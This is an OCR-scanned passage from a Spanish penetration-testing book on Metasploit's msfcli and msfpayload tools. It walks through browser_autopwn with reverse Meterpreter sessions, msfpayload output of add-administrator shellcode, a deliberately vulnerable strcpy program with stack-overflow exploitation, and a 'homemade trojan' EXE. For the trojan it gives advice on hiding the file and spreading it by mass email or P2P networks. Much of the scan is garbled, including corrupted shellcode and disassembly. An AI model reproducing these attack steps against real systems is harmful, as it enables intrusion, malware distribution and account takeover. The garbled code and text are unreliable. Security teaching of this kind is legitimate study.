de lanzar este modo en la aplicación msfeli. 


Beneficios del uso de msfeli 
Los beneficios de la utilización de este tipo de interfaz son varios. Uno de los mayores usos y 
beneficios que proporciona msfcli es la posibilidad de implementar servidores de conexiones 0 
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sesiones. De este modo el auditor puede lanzar la etapa de explotación y recibir las conexiones en 
cualquier otra máquina configurada para ello mediante el uso de msfc/i. Además, se pueden resumir 
los beneficios de la utilización de msfcli con las sentencias que se muestran a continuación: 


- Soporte para el lanzamiento y aprovechamiento de los módulos de tipo exploit y auxiliary. 
Este Lipo de módulos son los más funcionales que proporciona el framework, además de los 
más utilizados en el proceso de un test de intrusión. 


- Uso para tareas especificas en el test de intrusión. Generalmente, se utiliza ms/cli para 
lanzar un exploit concreto o implementar un servidor de sesiones remotas sobre las máquinas 
vulneradas. Existe un debate sobre si esto último es un beneficio о по, ya que se puede 
entender como una razón restrictiva. 


- Esta herramienta es útil para el aprendizaje y la comprensión de la arquitectura del 
framework. 

- Ев conveniente usarla cuando se desarrolla algún nuevo exploit y se pretende utilizar 
en un test de intrusión. De este modo se mantiene un control sobre la operativa que se está 
llevando a cabo en el proceso de la auditoría. 


- Es una buena herramienta para realizar pruebas por el auditor. Este tipo de pruebas son 
denominadas off exploitation. Estas pruebas serían las equivalentes a montar un entorno de 
preproducción. | 


- La aplicación es bastante útil si el auditor conoce realmente qué exploit quiere utilizar о 
qué tipo de técnica se utiliza en la fase de explotación. 


Teoría de conexiones 

Cuando un exploit es lanzado contra una máquina objetivo se busca obtener una sesión que 
proporcione el control del equipo remoto. Estas sesiones pueden ser directas o inversas, las cuales 
trabajan de manera similar а como lo hacen los troyanos en sus conexiones. 


Ei uso de sesiones inversas puede ayudar al auditor o atacante a evitar los firewalls implícitos 
que llevan los router. Hay que recordar que todos los exploits que utilizan el método de conexión 
inversa utilizan implícitamente el módulo llamado exploit/multi/handler, el cual recibirá la sesión 
inversa sobre la máquina remota. Este módulo proporciona una gran cantidad de oportunidades a los 
auditores o atacantes, los cuales se presentan en este apartado. 


En gran parte de la documentación que se puede leer sobre Metasploit se presenta la máquina 
que lanza los exploits о el servidor que utiliza la técnica Client-Side Attack сото la máquina que 
gestionará y aprovechará las sesiones obtenidas sobre los equipos vulnerados. Este hecho no ticne 
porqué ser así, ya que se puede utilizar un servidor o máquina para provocar la obtención de sesiones 
en la fase de explotación y que dichas sesiones se gestionen sobre otras máquinas. 


¿Cómo se realiza dicha acción? El concepto es realmente sencillo, cuando se configura un exploit 
se puede elegir el payload que se ejecutará en la máquina remota, en caso de que la explotación 
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tenga éxito. El payload de tipo inverso debe ser configurado con una dirección 1р en la Cual 
ejecutado en la máquina víctima, se conectará para otorgar el control de dicha máquina 


‚ una vez 


En la imagen se puede observar como el atacante real se encuentra en una red privada, como puede 
ser la de cualquier empresa o casa. Por otro lado, se visualiza una máquina víctima que simula 
encontrarse en la red de una empresa. El atacante dispone de un servidor, por ejemplo web, que 
utilizando la técnica Client-Side Attack espera a recibir peticiones de víctimas potenciales. En 
el momento en que la victima es vulnerada, el payload que se ejecuta en ella dará el control de 
la máquina al equipa del atacante y no al servidor web. De este modo se consigue que el rastro 
de la explotación quede distribuido, ya que una máquina se encarga de la tarea, posiblemente 
automatizada, de explotación, mientras que la gestión de la sesión remota, que es realmente lo que 
interesa, se realiza desde otra red totalmente distinta, 


4 Sorvidor 
Y Explolt 
Slent-Side 


| 


Víctima 


Fig 5.08: Esquema básico de la fase de explotación. 


Esta explotación y gestión distribuida puede ir un paso más allá, ya que se podría configurar en 
el servidor, el cual está disponible en Internet, distintos exploits con distintos payloads los cuales 
podrían apuntar a distintas direcciones IP. De nuevo, el rastro se distribuye entre distintas máquinas, 
y aunque tampoco sería demasiado complejo realizar un rastreo a priori, se podrían ocultar las 
conexiones a través de máquinas vulneradas que hicieran de puente, Estas conexiones se pueden 
distribuir e intentar ocultar de diversas maneras, en este aspecto entra en juego la imaginación del 
atacante o auditor. 
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PoC: Servidor de exploits y máquina privada para las sesiones 

En la siguiente prueba de concepto se preparará un servidor con el módulo auxiliary para realizar 
un axtopwn browser. Cuando las víctimas se conecten al servidor web se lanzarán exploits contra ia 
máquina que origina la conexión. Como máquina víctima en la prueba de concepto se ha utilizado 
un equipo con sistema operativo Windows XP SP3 con los navegadores Mozilla Firefox e Internet 


Explorer. 


Fin el servidor se configurará un payload de tipo Meterpreter con conexión inversa y además se 
indicará la dirección IP dónde se encuentra la máquina que gestionará o recibirá las sesiones de 
Meterpreter. La máquina que recibirá las sesiones inversas será configurada con la aplicación ms/cli 
y el módulo exploil/multi/handler, cuya configuración se estudiará más adelante. 


En la imagen se puede visualizar la configuración del módulo auxiliary/server/browser_autopwn y 
la asignación de los valores a las variables que dispone el módulo, Hay que destacar que el servicior 
web se configura con URIPATH en la raíz, es decir con “/”, La variable PAYLOAD_WIN32 indica 
qué payload se utilizará para sistemas operativos Windows, en este caso sólo se puede asignar 
el payload windows/meterpreter/reverse_ícp. El puerto dónde el servidor web se mantendrá a la 
escucha de peticiones será el 80, configurado manualmente, ya que por defecto sería el 8080. La 
variable LHOST indica en qué dirección ЇР o nombre de dominio se configurará la máquina que 
gestionará o recibirá las sesiones inversas. | 


asf > use auxiliary/server/browser_autopwn 
asf auxiliary(browser_autopwn) > show options 


todule options (auxiliary/server/hrowscr_autopwn): 


Name Current Setting Required Description 
LHOST yes The ТР address to use far reverse-connect payloads 
SAVHOST 0.5.8.0 yes Тһе local host to listen on. This must Бе an address de 
| the local machine cr 6.0.0.0 
SRVPORT 8080 yes The local port to listen on. 
551. false no Negotiate SSL for incoming connections 
SSLVersion 5513 no specify the version of SSL that should be used (accepte 
1{ 5512, SSL3, TLS1) _ : 
URIPATH no The URI to use for this exploit (defaul: is random) 
nsf auxiliary(browser_autopwn) > set LHOST 192,168.1.39 
LHOST => 192.108.1.39 
psf auxiliary(browser_autopwn) > set PAYLOAD WIN32 windows/meterpreter/reverse” tcp 


sf auxiliary(browser_autopwn) > set SRVPORT 88 
RYPORT => 80 
E duxiliary(browser_autopwn) > set URIPATH / 


la aula => Windows/meterpreter/reverse_tcp 


ВІРАТН => / 7 
asf auxiliary(hrowser_autopwn) > гип 


Fig 5.09: Configuración del servidor con el módulo browser autopwn. 


Una vez configurado el servidor web a través del módulo browser autopwn se debe configurar en 
la otra máquina que gestiona el atacante o el auditor el módulo exploit/multi/handler. Mediante la 
aplicación msfcli se configurará dicho módulo para comprobar la utilidad de dicha herramienta. 


Capitulo У Otras msf tools 


‚ Hay que destacar la posibilidad de que la máquina se encuentre detrás de un router, lo cual implicari4 


La configuración es realmente sencilla, se debe indicar е] tipo de payload el cual se puede inyectar 
en este caso Meterpreter, también se debe indicar la dirección ІР local de la máquina y el puerta 


dónde se escuchará, О | 4 


є 


que se debería abrir un puerto en el router para redirigir el tráfico y que éste pueda llegar desde 


Internet hasta la máquina del atacante, 


rootároot:-* msfcli exploit/multi/handler LHOS 
_tcp LPORT=4444 E 
[*] Please wait while we load the module tree... 


1=192,168,1,39 PAYLOAD=windows/meterpreter/reverse 


=[ metasploit v3.7.0-release [соге:3.7 арі:1.0] 
+ -- --=[ 684 exploits - 355 auxiliary 
+ -- --=[ 217 payloads - 27 encoders - 8 nops 


LAGST => 192,168.1.39 

PAYLOAD => wintdows/meterpreter/reverse tcp 

LPORT => 4444 7 

[*] Started reverse handler оп 192,168.1.39:4444 
[+] Starting the payload handler... 


Fig 5.10: Configuración de ms/eli para recibir gestionar o recibir sesiones inversas. 


Una vez montada toda la infraestructura por parte del atacante o auditor se debe esperar a que las 
víctimas se conecten al servidor web malicioso, Como ya se ha mencionado en este libro se pueder 
utilizar diversas técnicas para provocar que las víctimas visiten dicho servidor. 


Una vez que la víctima se conecte al servidor web malicioso se lanzarán los exploits sobre ella, y 
en caso de que ésta sea vulnerable se lanzará una petición a la máquina que está configurada con el 
manejador o exploit/multi/handler, el cual al recibir la petición inyectará el payload en la máquina 


de la víctima respondiendo a dicha petición, 


[+] Started reverse handier on 192,168.1.39:4444 
[+] Starting the payload handler... 


[+] Sending stage (749056 bytes) to 192.168.1.38 


iv] Meterpreter sessio e : «> ji : 
{з р п 1 opened {192.168.1.39:4444 -> 192.168.1.38:1030) at 2012-08-13 20:58:44 


meterpreter > 
meterpreter > pwd 

C; \WINDOWS\ system32 
rpreter > 


Fig 5.11: Obtención de una sesión inversa con msfeli. 
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3. Msfpayload: payload a gusto del consumidor 


Msfpayload es una de las herramientas más utilizadas del framework de Metasploit. Con esta 
herramienta de línea de comandos se puede generar código ejecutabie personalizado, en distintos 
lenguajes como puede ser C, Perl o Ruby. Este código permite realizar acciones concretas, más 
típicas de payloads de tipo Inline, o montar todo un servidor de opciones en una máquina vulnerada 
a través de un exploit, más típico de payloads de tipo staged. 


La funcionalidad anterior proporciona a los exploiters la posibilidad de disponer de gran cantidad de 
payloads en distintos lenguajes para la creación de sus exploits. En este apartado se podrá estudiar y 
comprobar cómo funciona esta herramienta y los distintos lenguajes de programación que soporta. 
Otra de las funcionalidades interesantes que proporciona ms/paylvad es la de crear ejecutables que 
dispongan en su interior un payload concreto. De este modo es posible crear ejecutables maliciosos, 
que puedan proporcionar al atacante el control remoto de la máquina donde se ejecute el archivo. 
Esta lécnica, que es la más intuitiva y generalizada, se puede llevar a cabo tanto en sistemas 
operativos Windows, como Unix. En este apartado, se realizarán distintas pruebas de concepto donde 
se estudiará la viabilidad de la creación de ejecutables y paquetes DEB, Debian, 


La sintaxis de la herramienta es realmente intuitiva y sencilla, como se puede observar en la siguiente 
línea msfpayload [VARIABLES, LHOST, LPORT, PAYLOAD] <modo>. Los modos proporcionan а 
la herramienta gran flexibilidad y toda la potencia que presenta al auditor o atacante. 


Por último, hay que tener en cuenta que estos archivos pueden ser fácilmente detectados por las 
bases de datos de firmas de los antivirus. Este es un debate muy actual, que existe en el día a día del 
peniesting. Existen técnicas para intentar evadir el mayor número de sistemas de protección, como 
puede ser un antivirus, y se estudiará más adelante en el presente libro. 


Modos de msfpayload 

Los modos de ejecución que dispone ms/payload permiten realizar distintas acciones relacionadas 
con los payload. En la imagen se pueden visualizar los distintos modos que ms/payload proporciona 
al auditor. Es posible distinguir entre dos modos de ejecución jerárquicos, el primero para la 
obtención del payload en un lenguaje de programación y el segundo para la creación de binarios 
en distintos sistemas operativos. Cada uno de estos modos tiene distintas variaciones internas, las 
cuales se pueden ir observando en este apartado, | 


ү + msfpayload 
І Usage: /opt/framework3/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C| [PJerl¡R 


ub{y}] {R}]aw] [2]5{е[Х]е] [DJU | [V]BA] [UJar> 


Fig 5.12: Modos de ejecución de ms/payload. 


El modo $ o summary proporciona información sobre el payload que se quiere utilizar. Se debe 
indicar la ruta del payload y especificar el modo de ejecución al final de la instrucción. Este modo 
ayuda al auditor a conocer las variables de configuración del payload que deben ser configuradas, 
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tanto para la obtención de código en un lenguaje de programación concreto, como pará la generación 
de binarios. Además, con este modo se proporciona una descripción y el tipo de payload que es, por 
ejemplo con Aeterpreter se indica que es de tipo staged. · 


rootgroot:-4 msfpayload windows/meterpreter/ reverse_tcp 5 | 
і Маше: Windows ticterpreter (Reflective Injection), Reverse ТСР Stager 


Мойше: payload/windows/meterpreter/tev£ S32 tcp 
Version: 19394, 8998, 8984 
Platform: Windows 3 
Arch: x86 | 
Needs Admin: No 
Total size: 290 
Rank: Normal 


Provided dy: 
skape <«miilerghick. org> 
sf <steplién: fewer@harmonysecurity. com> 
hdm shdm@metasploit. com> 


Basic options; 


Hame Current Setting Required Description 

EXITFUNC process yes Exit technique: seh, thread, process, попе 
LHOST yes The listen address a 
LPORT 4444 yes The listen port 


A CO LO DO O e r n e: 


Description: 
Connect back to the attacker, е the meterpreter server DLL via 
the Reflective Dil Injecti taged 


Fig 5. n Ejecución Summary de ms/payload. 


El modo С u obtención de código en el lenguaje de programación С, proporciona al auditor о 
exploiter una variable definida en este lenguaje, con el valor del pandas que debe ser ejecutado en 
la máquina vulnerada, 


rovtgroot:-+ msfpayload windowsfadduser USER=i64 PASS=pabloglez С 
Ы ] 
* windows/adduser - 272 bytes 
| * http://www. metasploit. com ` 

* EXITFUNC=process, USER=i64, PASS=pabloglez 

*/ 

unsigned char buff} = 

"Ax FCAXEBAXBIA BOBA ROO XBOAXGRARBS e TAX IA MOZA 64 AXBDAX571X30" 
"\хВіхх524хөс\хВЬ\х52\х14\х804х72\х28\ ROAD AZAR f" 
UNA ICON ACA ICA BA CA ROZA ZONA ZA ETA CÍA OO A GIA ROTA хе?" 
PARO NIZA RS TA RBDA SZA ION BD RAZA RICA ROTA ADO BDA ADA XTBAX8B5" 
"AXCONAZIA BA XBIA MOB XSD XBDA GBA XIBAXEDA SB x20 XOLA BA E" 
“Ax 3 CAIB DA IIA XBLA XBLA OGG GIA ETA RIA CO aC AX C TA CÍA хей" 
"ABARCA IBA IA TAE GA MOZA RTONAFBAXIDA TOA 2475 Nx 2AX58" 
"AXBRAXSBA 24 XI XA GEA ABD ABONA GDA BARBA MICA ROMA UBA xb” 
“AO ABLA XBLA RL xB 44 24202 4AXS HA XSDARGIA XA xa RS IA XT E" 
"AXegAXSBA RS FAA ABDA IZA XEDARBGA BON GA RBA XBAA ABS AMD IA X00" 
PAXGOA BASI REGA IA BLA GBA RF SA DRA TOA xd \ха2\х55” 
"ABBA BRISA zbdy xId\xf RA ESA ICA BEA XT CAOBA BON AFA CATS" 
"\х@5\хЬЬ\х47\х13\х72\х6Г\хба\х@ё\х53\хЇТ\хБ\х63\хбЧ\хб4\х2ге” 
^\х65\х78\х65\х26\х2Т\х63\х28\хбе\х65\х74\х26\х475\х73\хб5\х72" 
"\х28\х69\х36\х34\х28\х78\хбБ1\х62\хб6с\хбЇ\хб7\хбс\хб5\х7а\х28" 


“\х2{\х41\х44\х44\х28\х2б5\425\х28\хбе\х65\хХ74\х2@\хбс\хб\х63" 
“\хб1\хбс\х67\х72\хб61Т\х75\х70\х28\х41\х64\хбЧ\хб69\хбе\хб9\473” 
"ANTAG TAS ATZ TIRO GS 3 3 28 2 xa т\х44" | 


Fig 5.14: Obtención variable en С del payload windows/adduser: 
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л. 


Chando se está desarrollando un exploit, estas opciones de ms/payload son realmente útiles у 
ngcesartas para facilitar el proceso de obtención de control de la máquina vulnerada. En el ejemplo 
anterior se utiliza el payload windows/adduser el cual creará un usuario en el sistema donde se 
ejecute con una contraseña definida. 


Pal la obtención de este código en otros lenguajes de programación se dispone de los modos “у” 
y * P”, que se corresponden con la generación de código en lenguaje Ruby y Perl respectivamente. 
+ ¿+ ‘amente se debe especificar el payload, las variables de configuración de dicho módulo y la 

te identifica el modo de ejecución. Si se requiere obtener código en Ruby se utiliza la letra 


> + tal y como se puede visualizar en la imagen. 


Irootfroot:-4 msfpayload windows/adduser y 
#. windows/adduser - 287 bytes 
http://www. metasploit.com 
"¿2 EXTTFUNC=process, USER=metasploit, PASS=metasploit 
buf = 
"\хЁс\хев\хВо\хөв\хев\ XBA хбВ\хВ9\хе5\х31\хй2\хбз\хВЬ\х52” 
NXSO BD RS ZA XGC\XBb\X52\X14\X8b\x72\x28B\x6f\xD7\x4a\ x26” 
ARI A CON xa CAI CAMBAA XT CAXBZA XZ CA ZA CIA CÍA MOB 
"AXO1A Xx xEZAXFON NE 205 7AXBDAXS2AXTOAXBDA MAZA XBCAAB IO" 
"\хаһ\х1@\х78\хВв\хсб\х74\х4а\хӨ1\хба\ AGO BD AB LIN Oo 
"AXSON ZOO IA XI ESB CA ARI ABLA IA BDO AAA XBLA x EF" 
"\хЗ1\хс®\хас\хс1\хсТ\хёй\хё1\хс7\х3З8\хеб\х75\х1Л\хёЗ\х7" 
“\хТ8\хзЬ\х7Ч\х24\х75\хел\х88\хВЬ\хвВ\х24\хӨ1\ха3З\хбб\х8һ°” 
“\хёс\х4Б\х&Б\х5В\х1с\хёт\хаЗ\хВһ\хбл\хВЬ\хӘ1\хб®\ х&9\х44" 
“\х24\х24\х5В\х5В\хб1\х59\хЗВа\х51\хТТ\хей\хкВ\х5Т\хба\хаһ" 
"\х12\хер\хаб\х50\хба\хөл\хвд\ ха5\хЬэ\хое\хөө\хөө\хѕо\х6в= 
"\хЭ1\хабухбт\ха7\хР\ха5\ XDDA XTOA DS ха2\ х56\х68",хаб\х95* 
|уАхоо\хаа\х Т \х@5\хзс\хвБ\х7с\хВа\хав\хТЬ\хеб\х75\хёз\хһ” 
| 


а o ri sr, 


"EA XIINATA RO ABBA XOO GIFT хаз\хбз\хбо\хба\х2е\хөѕ" 
"\х?В\х65\х2В\х2Т\хб3\х2®\хбе\хб65\х74\х2Ә\х75\х73\хбв\х72°" 
"\Х20\хба\хб5\х74\хӧ1\х73\х79\хбс\хб#\хб9\х74%х203х60\ х5" 
“\х74\хб1\х73З\х78\хбс\хб1Т\хб9\х74\х2а\х2{\х41\х44\х44\х20" 
"\х2б\х2б6\х2@\хбе\хб65\х74\х2@\х&с\хбТ\х63\хб1\хёс\хб7\х72* 
“\х6Г\х75\х78\х2@\х41\хб4\хбй\хб®\хбе\х69\х7З\х74\х72\хбї1” + 
| \Х74\ХбТ\х72\ х73\х20\х60\ хб5\х74\хб1\х73\х70\хбсухЕ\хб9" + 
а МА АДТАЙ 


# + Жтт о +з + +4 ++ з +з + + р + 


Fig 5.15: Obtención variable en Ruby del payload windows/udduser 


El modo R o raw permite obtener código en lenguaje máquina. Como curiosidad indicar que en el 
ejemplo se pueden observar los strings y las órdenes que se están asignando en el código máquina. 
Se puede visualizar fácilmente la acción que realiza el payload, donde se abre un cmd y se ejecutan 
las órdenes de añadir un usuario con una contraseña y además se agrega el usuario al grupo de 
administradores de la máquina, 


HOF EH 1BIOROOA 
бвдш 0; }$ибхбх$ гөрөн Хх 2806402816100 

КӨХ И ВО $$ (аїгобох 20607 9800РҺ2 6008000060006 
600106 ој 56@сто. ехе /с net user metasploit metasploit /ADD && пет localgroup Administrators met | 
asploit /ADDroot@root:-# Y | 


AN 
rootúroot:-* msfpeylcad windows /adduser R i ' | 


Fig 5.16: Obtención de código máquina. 


LI тодо X o ejecución permite obtener cód; go ejecutable en formato EXE para sistemas operativos 
Windows. Existen otras opciones o modos que proporcionan funcionalidades para crear DLLs, 
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:ódigo VBA o Javascript. Más adelante, se estudian los resultados, más que interesantes, del modo, 
сіесисібп о X, 


PoC: Obtención de payload para implementación en exploit 


Еп esta prueba de concepto se presenta el desarrollo de un pequeño programa en el lenguaje de 


programación С, el cual será vulnerable a buffer overflow, la cual como se ha mencionado en este, 
líbro es una de las vulnerabilidades más comunes en el desarrollo de aplicaciones. 


4 


En esta prueba de concepto no se pretende enseñar el complejo mundo del reversing, pero sí explicar 


cómo funciona un buffer overflow y como con Metasploit se puede obtener el código de un payloac 


para añadir а! código del programa vulnerable. A continuación se presenta aplicación, escrita ез 
lenguaje C, vulnerable, 

include <stdio.h> 

int main (int argc, char “**argv) 


{ | 
char buf(10]; 


«printf (“holamundo”) ; 


strcpy(but,argv([1]); 
return 0; 


| 


Realmente, ¿qué se busca? Se quiere controlar y modificar los registros del procesador, sobretodo el 
registro EIP o contador de programa, el registro ESP el cual apunta a la cima de la pila y el registro 


-RETN que indica la dirección de retorno de una función. El registro EIP indica qué instrucción 
se ejecutará a continuación y puede proporcionar a un atacante la=posibilidad de ejecutar las 


instrucciones que él quiera у en la zona de memoria que él necesite. Es evidente, que la zona de 
memoria que se requiera albergará el shellcode que se quiera ejecutar para realizar alguna acción 
concreta sobre la máquina víctima o tomar el control total de dicho equipo. 


¿Fl programa es vulnerable? La respuesta es sí, este código no limita el acceso a la memoria y se 
puede sobrescribir fuera de los límites que el sistema operativo ha desienado para іа ejecución de la 
aplicación. Si el usuario manipula la entrada y sobrepasa los límites, se podrá acceder a otras zonas 
de memoria y controlar los registros que interesan. En el caso de la aplicación, la función vulnerable 
es sirepy ya que en ningún instante se comprueba que la variable argvf7] pueda ser copiada en un 


espacio de memoria reservado de 10 bytes, representados por la variable buf. 


Ri primer paso es ejecutar el programa y comprobar que si se introduce en argv[1] un valor inferior 
o igual a 10 caracteres la aplicación funciona correctamente, pero si se introduce un valor superior a 
19 caracteres, cuando la función strcpy intente realizar la copia еп la variable buf, la cual dispone de 
una zona de memoria reservada de 10 byres, se producirá un error. Lo que está ocurriendo es que se 
está sobrescribiendo una zona de memoria no reservada para la variable buf. 


A continuación se presenta gráficamente lo explicado anteriormente. Antes de que la aplicación 
realice la llamada a Ја función strcpy se prepara la pila, la cual recoge la dirección de retorno de la 
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Pinción, las variables internas del compilador y las variables locales de la función. En esta prueba de 
concepto las variables locales de la finción son un puntero del buffer de 10 caracteres, un puntero а 
la variable agrvf1] y el contenido local del buffer. 


ada ОО22ЕЕ Utero al DU ЕГ dirección ПОЕТИКИ 

0022 FOd|| 00360F0d | жж БШ "һо{а1234" | 

КЕ И ЕЕ Ch А argy Ц zona | 

г DOSEFFACH 0401226 за. RETURN fron prueba. DE4DI2EA бо prueba, Brass | 

паре 0022FF ҮЗ | 

GBERE HA 7669534 а, ЗЕТОАН Еу ДЄ тї ҮЛЕ? iÈ ы > EBRGERA | 

паар ле goeree n ”. [Contenido de los 10 caract: 

рош 00481946 Де RETURH from ms e los 10 caracte i Е 454810:6 | 

ЖЕ Зу Ho. è 

годзе 24 1 доҷиова а 2, | Espacio local pila... 

сарров | OM22FERS|h 7, А 

ОСЕ LOGINID 4| нарны Dirección retorno de la función 

[ Ойг2ЕЕЭй| 9000909218... | | 
A | 


Fig 5.17: Estado de la pila en el instante previo de la ejecución de ja llamada a згер. 


si en la ejecución del programa se le ha pasado como primer argumento, en argv[1], un valor 
superior а 10 caracteres, como por ejemplo “hola! 234aaaaaaaaaaaaaaa”, se producirá seguramente 
la caída de la aplicación. ¿Por qué? Es sencillo, en este ejemplo hay un espacio en la pila para 
albergar 10 caracteres y la función strcpy intenta alojar más, se está sobrescribiendo memoria, por 
debajo de los límites. 


Entonces, muy probablemente se esté sobrescribiendo el valor de la última instrucción que se ejecuta 
en la pila, la cual es la dirección de retorno de la función o RETN, En la siguiente imagen se puede 
visualizar de manera muy intuitiva, 


al 54аазааадаа ааааазааааааааааава вада, 


ua TELAS i PEONO A 


1“ ПЕТЯ 
Contenido del buffer = hola1234a884... 


21€ Dirección retorno apunta a 61616161 = аааа 


BD2SFFJO] 7ЕЕПЗООй 


Fig 5.18: Estado de la pila en el instante previo a finalizar la ejecución de la función strcpy. 


Hasta ahora se ha aprendido como causar una caída de una aplicación haciendo que la dirección de 
retorno a una zona no controlada o no autorizada. ¿Y 51 se quiere ejecutar código arbitrario?, ¿Dónde 
debe introducirse el shellcode? El shellcode debe introducirse en la pila justo debajo de la dirección 
de retorno. ¿Por qué debajo? Cuando se ejecute la dirección de retorno se desapilará y en la cima de 
la pila quedará la primera instrucción del shellcode. 


Ahora hay que conseguir que se ejecute la primera instrucción del shellcode. Para ello la dirección 
de retorno de la pila debe ser una dirección que contenga una instrucción de salto incondicional a la 
pija, ЈМР ESP, 
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ОАТ АВН O, „ 


237 
Son РТК 05: (EDX-3),8H 


4 
Tei КЕ Of segnent register 


РЕЧИ 
ТБ 
75141 
75141 
тЫ 
76141 Unknoun command 
ЕК сЕ EBX Illegal use of register 
Elo 
25141230] GESEFE ОЕР” Sinz, УНИ? ЕЙ eones 
25141293] FF82 COSCFF7S DWORD PTR DS: LEEN+75FF3CCO) s, ; 
78141239] C4FF ES EDI, EDI illegali use of register E BA] ETF 
ХБН 2301 20 08 ЈО SHORT 75141241 
75141220 USH ЕЗІ у { 
ТБМИЗЗЕ, ES ФЕЫБЕРЕЕ [CALL 75196 H 
256141243] 2846 НОО EAX, DWORD PTR З6:СЕВР-5С2 | 
751412461» ЕВ £ HP SHORT 7514120 | кым ых ал то і 
75141249 БЕРЕН р, PUSH ПЫОВП РТА SS: LEBP-391 | | і 
25141246 PUSH EBX Nantes і 
КЕ Чун CA OY ER ВЫОКО РТА П5:ТЕЙИ+ЗӘ1 Ж | 
2 G Sü [ i 5:[ЕЙХ+® ` i Н 
ТЕН ЕТӘ 18 PUSH DYORD РТВ 05: [EAX+18] : Intermadular calls 
76141252]  FFIE 14101375 |CALL DWORD PTR 09:1751318147 | р; 
2514125 HOJ DWORD РТА 85: (ЕВР-391, EBK | Е 
г5141261[^ ES SOFOFFFF — [JP 7S14BFES | : Command.. Ст 
ЖИП, брае 1111147600 BYTE PIE OS: гЕотж2#781411111,01. El 7 
1412 г ЧІ 2+ 
БИ. Es cù НДЕ pr su dia A E Sequence of commands.. ; 
ФІГ] Fl ЕА, ас И геи не кү Constant, | 
isid1223] ӨҒ147Б 08 ШРС рв Бан Е ЕЕ A Bi 
тс DE Si Н | жс Ж EA TE 
EHEN са f з | imar sining СЕВ 
2211120 ` Adä labela 2 7 Союп - 
га es ES nt) ; беге again Син. 
20 Я ‚ Assembies. Ое? cota Space |! de a 
: O е УРАР Search reverse. Ctrl+ShiftrL f 
i i Add comment 7 ¿Semicolon (} 3 
n Í Breakpoint, BE E N м commands,. 
0819200000 69 T a e de] ¿A command sequences.: 
1941001 ў 2] би tn И А А ж i 
айапйгй1й}рС 13 40 06108 Ad бй Bajos | Мен origin here. луу A ray? ' Alt constants. 
00402026] 00 оп 09 061 0А 00 00 00/40 о SE 
70492239) 05 00 йа Galas йй па 90/60 Койо їп Dump ~ A: | : 
29402040) Өй ún юй 001009 20 06 00169 E A A х. ¿Allreferenced strings 
oiea ae o ele g g e| ТАЛ ВИСИ 
БЕ Пд йи йй 4400 w3 йй Й A А = : ž ` А А ts 
en д9 06 09 AEN 69 ба 00 da A Ышш ‚у Alt user comment 
Н" + 
DotA D 07.0000 АГАЛА earch {ау ы. Аел”, ОО} All floating constants 


Fig 5.19: Localización de una instrucción de salto incondicional a la pila. 


Una vez localizada la dirección que contiene este tipo de instrucción ya se dispone de lo necesario 
para volver a la pila cuando el usuario requiera. Justo debajo de la dirección de retorno se debe 
sobrescribir el shelicode. Como ejemplo se presenta la siguiente entrada a la aplicación anterior, 
“holal 234auVaa<dirección jmp+esp><shellcode>”. La primera parte de la entrada es “basura” 


para llegar a la dirección de retorno de la pila, que es parte imprescindible de la entrada. La tercera 


parte de la entrada son las instrucciones en hexadecimal del shellcode. 


En la generación del shellcode entra en juego Metasploit y la herramienta ms/payload. Hay que tener 
en cuenta que hay que eliminar los bytes 1x00 ya que producirán un final de cadena y hará que el 
exploit no se ejecute completamente. 


Tras generar el shellcode se puede declarar una variable en el interior del código en С dónde se 
anexen la parte denominada anteriormente “basura”, la dirección de retorno en hexadecimal la 
cual apunte a una instrucción JMP ESP y por último el código en hexadecimal proporcionado por 
msfpayloud. Esta variable será la que se pase a la función strcpy, en vez de utilizar arvg[ 1] como en 
el caso original. 


PoC: Creación de un troyano casero 
En esta prueba de concepto se creará mediante la herramienta ms/payload un fichero ejecutable 
para sistemas Windows. Este ejecutable dispondrá en su interior de un payload, el cual será elegido 
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por el atacante o auditor con el propósito de realizar una funcionalidad concreta o un conjunto de 
funcionalidades. 


Para la creación del fichero binario se elegirá el payload conocido como Meterpreter. La conexión 
que llevará a cabo el payload será inversa, reverse_tcp. Hay que tener en cuenta las variables que se 
deben configurar en el instante de crear un ejecutable. 


: 
Es recomendable mezclar este ejecutable con otro tipo de archivos, ya que en el momento en el 
que la víctima ejecute el binario aparentemente no ocurrirá ninguna acción. Tanto esta última 
recomendación, como la distribución de este archivo, pueden ocasionar un debate amplio en el 
ámbito de la seguridad informática, acerca de la mejor manera de realizar dichas acciones. Como 
se ha mencionado en este libro, una vía podría ser la utilización de envío masivo de e-mails en una 
empresa. 


А continuación se enumeran las opciones a tener en cuenta para la creación del ejecutable, o como 
se һа denominado en la prueba de concepto, la creación de un troyano casero. 


- El payload. Para la prueba de concepto se utiliza un Meterpreter, pero en algunas 
ocasiones puede ser interesante utilizar otro payload que simplemente ejecute cierta acción 
en el sistema de manera silenciosa, por ejemplo windows/adduser. Si un atacante dispone de 
acceso а la máquina víctima, en un posible ataque dirigido, se podría utilizar dicho payload 
para lograr acceso físico como administrador de la máquina. 


- А] ser un payload de conexión inversa, las variables que deben ser configuradas en el 
módulo del payload son LHOST y LPORT. La variable LHOST representa Ја dirección 1P 
de la máquina del atacante, dénde se recibirán las conexiones de Meterpreter mediante la 

‚ utilización de la herramienta msfeli. Por otro lado la variable LPORT representa el puerio de 
la máguina del atacante donde se escucharán las sesiones inversas. 


A y 
192.168.1.39 LPORT=4444 X > troyan 


rootgroot:-4* msfpayload vindows/meterpreter/reverse_ tcp LHOST= 
0.ExXe 

Created by msfpayload (http: //www.metasploit.com). 

Pay Toad: windows/meterpréter/reverse_tcp 

Length: 290 

Options: ("LHOST"=>"192.158.1.39*, "LPORT"=>"4444"1 


A 


Fig 5,20: Creación de un ejecutable con el payload Meterpreter: 


Tras la creación del ejecutable, éste se debe distribuir entre los objetivos, si el ataque fuera 
dirigido. La imaginación es uno de los puntos a tener en cuenta en este aspecto. Como se mencionó 
anteriormente una de las vías posibles sería el envío masivo de mails contra una organización, Si el 
ataque fuera no dirigido, las posibles vías de distribución aumentan, como por ejemplo compartir el 
archivo en redes P2P, subirlo a servidores de descarga y enlazario en foros, etcétera. 


Ahora hay que esperar a recibir las sesiones inversas de las máquinas víctimas. Para ello se utiliza la 
herramienta ms/cli mediante la configuración del módulo exploit/multihandler. La configuración de 
este módulo es realmente sencilla y ya se ha explicado en el presente libro, Hay que tener en cuenta 
que el payload debe coincidir con el configurado en el ejecutable. л 


Capítulo Y. Oiras msf tools 


rootdroot:-* msfcli exploit/muiti/handier 1HOST=192,168.1.39 LPORT=4444 PAYLOAD=windows/meterpre | 


terfreverse tcp E 
[+] Please wait while we load the module tree... 


| ) 
`__\ ы] |! ыа М.А ш E , 
